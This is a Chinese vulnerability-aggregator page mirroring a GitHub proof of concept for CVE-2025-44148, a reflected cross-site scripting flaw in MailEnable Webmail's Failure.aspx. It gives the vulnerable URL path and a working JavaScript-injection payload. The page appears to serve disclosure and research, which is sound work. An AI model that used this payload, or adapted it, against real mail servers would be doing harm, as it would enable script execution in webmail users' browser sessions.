POC详情: c5d8a49cdf3f778f3faca67177f0b9945f934792

来源
https://github.com/barisbaydur/CVE-2025-44148
关联漏洞
标题: MailEnable 安全漏洞 (CVE-2025-44148)
描述:MailEnable是澳大利亚MailEnable公司的一个基于 Windows 的商业电子邮件服务器。 MailEnable v10之前版本存在安全漏洞,该漏洞源于failure.aspx组件存在跨站脚本,可能导致任意代码执行。
描述
A reflected cross-site scripting (XSS) vulnerability exists in MailEnable Webmail due to improper user input sanitization in the failure.aspx. This allows a remote attacker to inject arbitrary JavaScript code via a crafted URL, which is then reflected in the server's response and executed in the context of the user's browser session.
介绍
# CVE-2025-44148 - Reflected Cross-Site Scripting (Reflected XSS)
Reflected Cross-Site Scripting (XSS) in MailEnable<br/>
Vendor: MailEnable Pty. Ltd.<br/>
Affected Versions: <10

# Description
A reflected cross-site scripting (XSS) vulnerability exists in MailEnable Webmail due to improper user input sanitization in the failure.aspx. This allows a remote attacker to inject arbitrary JavaScript code via a crafted URL, which is then reflected in the server's response and executed in the context of the user's browser session.

# POC
- Go to **/Mondo/lang/sys/Failure.aspx?state=19753** Page
- Use **%22;}alert(1);function%20test(){%22** Paylaod for exploitation
<br/><br/>
![2](https://github.com/user-attachments/assets/3ff590f5-a5da-4b50-b36b-0982ee2e4600)
文件快照

 [4.0K]  /data/pocs/c5d8a49cdf3f778f3faca67177f0b9945f934792
└── [ 763]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。